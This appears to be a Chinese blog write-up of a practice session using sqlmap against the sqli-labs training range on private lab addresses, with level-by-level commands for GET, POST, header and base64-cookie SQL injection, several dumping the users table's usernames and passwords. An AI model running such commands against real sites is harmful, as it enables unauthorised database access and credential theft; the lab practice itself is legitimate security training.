Sql-map测试报告

最新推荐文章于 2024-05-03 20:47:42 发布
最新推荐文章于 2024-05-03 20:47:42 发布
阅读量741 收藏 1
点赞数
分类专栏: sql注入 文章标签: 数据库 服务器 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/vsdfbhsdhsdfh/article/details/127130058
版权

Sql-map是一个它可以自动检测和利用 SQL 注入漏洞并接管数据库服务器,可以很方便的来测试sql注入

我们使用kali里面的sqlmap工具来测试一下

我们使用sqli-lab靶场来测试

Less-01

我们打开看是这个样子

我们尝试

寻找注入点

发现出来了

http://192.168.161.134/sqli-lab/Less-1/?id=1

我们试试sqlmp

-u是数据库的地址—dbs是爆出数据库名字

我们最好先找到注入点再来使用sqlmap否则可能会有错误

可以看出服务器mysql版本大于5.0

并且爆出了7个数据库

我们在尝试爆库

-D是指定数据库这句话的意思是爆出 security中 的表名字

我们在看看users表的字段名字

爆出在security中,users表中所有字段

我们在看看

这个就是users表中的所有数据

其他的1-8关sqlmap类似

Less08

这关是盲注,手工注入比较麻烦

我们最后在来爆一字段

Less011

这一关是post注入由于我们不能再url中注入,只能通过表单来注入

我们通过burp来抓包来看看表单传递的是什么东西

最后爆字段

sqlmap -u "http://192.168.161.134/sqli-lab/Less-11/?id=1" -data "uname=11111 &passwd=111111 &submit=Submit" -D security -T users -C id,password,username -dump

Less012

我们直接1‘没有回显

我们再试试是不是双引号报错

确实是双引号报错

sqlmap -u "http://192.168.161.134/sqli-lab/Less-11/?id=1" -data 'uname=1")&passwd=111111 &submit=Submit' -D security -T users -C id,password,username -dump

Less 013

一样的方法

sqlmap -u "http://192.168.161.134/sqli-lab/Less-13/" --data="uname=1&passwd=1&submit=Submit" -D security -T users -C password,username --dump

Less 014

Less 015

sqlmap -u "http://192.168.161.134/sqli-lab/Less-15/" --dbs --data="uname=1&passwd=1&submit=Submit" --level=3

Less 016

Less 017

Less 018

Less 019

这道题有点不一样,这道题是head注入

我们需要抓包sqlmap可以自动注入头文件

我们抓包来试试这个

然后我们在打开

Sqlmap

语句是sqlmap -r /1.txt –dbs

然后我们爆表

Sqlmap -r /1.txt -D sercity

Less 020

Less 021

这关是cookie注入,我们需要使用抓包软件来看看

我们使用sqlmap里面指定cookie

成功爆出后面的是一样的

Less022

这关的cookie使用了base64编码

我们先进行构造

然后想上关一样去使用输入cookie就行了

sqlmap -u "http://192.168.161.134/sqli-lab/Less-22/" --cookie="uname=YWRtaW4%3d=" --level=3 --dbs –batch

less023

sqlmap -u "http://192.168.161.134/sqli-lab/Less-23/" --dbs --level 3

less024

这道题使用了一个二次注入,sqlmap暂时没办法

less029

sqlmap -u "http://192.168.117.10/sqli-labs/Less-29/?id=1" --dbs –batch

bbiggl
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
安全测试(一)-Sqlmap的安装
qq_39485006的博客
05-29 531
但是我运行的时候执行不了,故在网上查找了另外的方式,直接python sqlmap.py -h 看到这个页面,表示安装成功。就会打开命令符所在的位置,直接右键“发送到”,“桌面快捷方式”,即可再桌面找到对应的快捷方式。找到本机的控制面板,到环境变量的用户变量和系统变量的path添加上对应的python路径。在电脑搜索框,输入cmd,开始菜单会出现命令提示符,右键,点击“打开文件所在的位置”在桌面找到对应的快捷方式,右键“属性”,修改起始位置为对应的sqlmap路径即可。8. 创建sqlmap的快捷方式。
mysql安全测试工具_安全测试工具之sqlmap
weixin_42510407的博客
02-03 243
介绍Sqlmap是一种开源的渗透测试工具,可以自动检测和利用SQL注入漏洞以及接入该数据库服务器。它拥有非常强大的检测引擎、具有多种特性的渗透测试器、通过数据库指纹提取访问底层文件系统并通过外带连接执行命令。支持的数据库MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Fire...
Fiddler+sqlmap实现自动化sql注入测试输出测试报告(渗透测试)
weixin_55393410的博客
04-15 5580
文章目录前言一、配置Fiddler自定义规则脚本二、使用步骤1.引入库2.读入数据总结 前言 提示:工具准备: python3.*+Fiddler+sqlmap+mysql(可选) 实现效果: 浏览器操作系统Fiddler将自动抓包接口数据存入.txt文件>运行python sqlmap 程序 >自动化sql注入扫描>将扫描结果写入mysql 一、配置Fiddler自定义规则脚本 打开fiddler 找到方法 【static function OnBeforeRequest(oSess
sqlmap进行sql注入测试的报告
weixin_35752233的博客
02-08 354
sqlmap是一款开源的SQL注入自动化工具。它可以帮助渗透测试人员自动化地扫描Web应用程序并检测SQL注入漏洞。 在进行SQL注入测试时,sqlmap会尝试将恶意SQL语句注入到Web应用程序的输入字段中,并检测程序是否可以执行这些语句。如果程序可以执行恶意语句,则说明存在SQL注入漏洞。 在测试结束后,sqlmap会生成一份报告,其中包含测试结果、发现的漏洞信息以及执行的SQL注入攻击。这份...
sqlmap基础必会--看懂报告log!
最新发布
qq_60450539的博客
05-03 358
sqlmap简单必会基础--看懂报告log!
安全测试——sqlmap
jin719的博客
09-12 89
扫描、发现并利用给定的URL的SQL注入漏洞主要用于检查SQL注入。
安全测试学习之SQLMap
我的成长之路
01-09 463
掌握 SQLMap 的基本使用
sql map用户手册.docx
10-09
5. 可以指定用逗号分隔的列表的具体参数来测试 6. 可以设定 HTTP(S) 请求的并发数来提高盲注时的效率 7. 可以使用-v 参数来观察 sqlmap 对一个点是进行了怎样的尝试判断以及读取数据 sqlmap 的使用方法包括: 1. ...
SQLmap-SQL注入
03-12
sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问...
SQL 注入 攻击 测试方法介绍
05-17
以下是对SQL注入攻击测试方法的详细介绍: 首先,理解SQL注入的基本原理。当用户输入的数据未经充分验证或过滤就被用于构造SQL查询时,就可能出现SQL注入漏洞。例如,在登录页面,如果用户名或密码字段直接拼接到...
SQLmap--SQL注入渗透测试工具
04-18
SQLmap--SQL注入渗透测试工具 方便进行SQL注入的渗透测试,它可以自动化检测和利用SQL注入缺陷以及接管数据库服务器的过程。 它有一个强大的检测引擎,许多适合于终极渗透测试的小众特性和广泛的开关,从数据库指纹、从数据库获 取数据到访问底层文件系统和通过带外连接在操作系统上执行命令
MyBatis-Plus 查询返回实体对象还是map
09-07
它提供了更便捷的数据操作API,包括丰富的CRUD操作以及动态SQL等功能。 **返回实体对象(Entity)** 1. **优点:** - 面向对象:返回实体对象符合面向对象编程的思想,能够更好地体现业务模型,便于代码的阅读和...
-hibernate-hb-05-map-collections-sortedmap:Hibernate地图集合-sortedmap
03-28
为了简化开发和测试,我们将使用自动配置 < property xss=removed>update 数据库表永远不会被删除。 当您要多次运行应用程序并保留现有数据时,此功能非常有用。 注意:请参见sql-scripts文件夹。 内部是创建...
【安全测试】sql注入-sqlmap使用
q_Catherine的博客
06-12 2838
Sqlmap 官网:http://sqlmap.org/ 特点:Sqlmap是开源的自动化SQL注入工具,由Python写成,具有如下特点: 1、完全支持Mysql、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird 2、完全支持布尔型盲注(由and、or得到的true或false)、时间性...
sqlmap使用详解
nex1less的博客
10-19 1350
0x01 sqlmap简介 sqlmap 是一个开源的渗透测试工具,可以用来自动化的检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。 0x02 sqlmap用法 转自: https://github.com/sql...
sqlmap学习(sqli-labs为示例)
quan9i的博客
02-17 4218
文章目录前言sql-map部分指令- -is-dba- -current-D,-T,-C- -dump-v--batchget类型检测可注入类型获取数据库获取表获取列名获取字段信息post类型准备工作检测可注入类型破解数据库方法一方法二破解数据表方法一方法二获取列名方法一方法二获取字段信息方法一方法二 前言 由于python学的啥也不是,脚本写的也很不咋滴(不会写),因此来学习sqlmap的使用,本人只是小白,如果出现错误还请各位师傅多多指正。 sql-map部分指令 - -is-dba --is-dba判
mysqlsqlmap_抽象SQL查询:SQL-MAP技术的使用
weixin_39536630的博客
02-02 312
什么是参数化查询?我们来看百度百科对此的定义和示例:一,定义------------------------------------------------------------------参数化查询(Parameterized Query 或 Parameterized Statement)是指在设计与数据库链接并访问数据时,在需要填入数值或数据的地方,使用参数 (Parameter) 来给值...
sql-map-2dtd
09-10
sqlmap是一个开源的自动化SQL注入工具,用于检测和利用Web应用程序中存在的SQL注入漏洞。SQL注入是一种常见的Web安全漏洞,攻击者通过在用户输入的数据中插入恶意的SQL代码,从而获取或修改数据库中的数据。 2DTD是sqlmap的一个模块,用于检测和利用漏洞时查询数据库中敏感数据的表。在注入漏洞中,攻击者可能会利用该漏洞从数据库中查询敏感数据,如用户名、密码等。 当使用sqlmap时,可以通过添加参数“--dtd-file”来指定DTD(Document Type Definition)文件。DTD文件是一种用于定义XML文件结构的声明,它决定了XML文件中哪些元素和属性是允许的。 使用2DTD模块时,sqlmap通过在注入点处插入恶意的SQL代码,构造一个恶意的SQL查询语句,从数据库中查询敏感数据的表。然后,sqlmap使用指定的DTD文件来解析查询结果,以确定其中哪些表包含了敏感数据。这样,攻击者可以更有效地获取目标数据库中的敏感信息。 总之,sqlmap-2DTD是sqlmap工具中的一个特定模块,用于检测和利用SQL注入漏洞时查询数据库中敏感数据的表,在查询过程中使用指定的DTD文件来解析查询结果。这个模块可以帮助测试人员或安全专家发现和利用Web应用中存在的SQL注入漏洞,进而加强对Web应用的安全防护。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值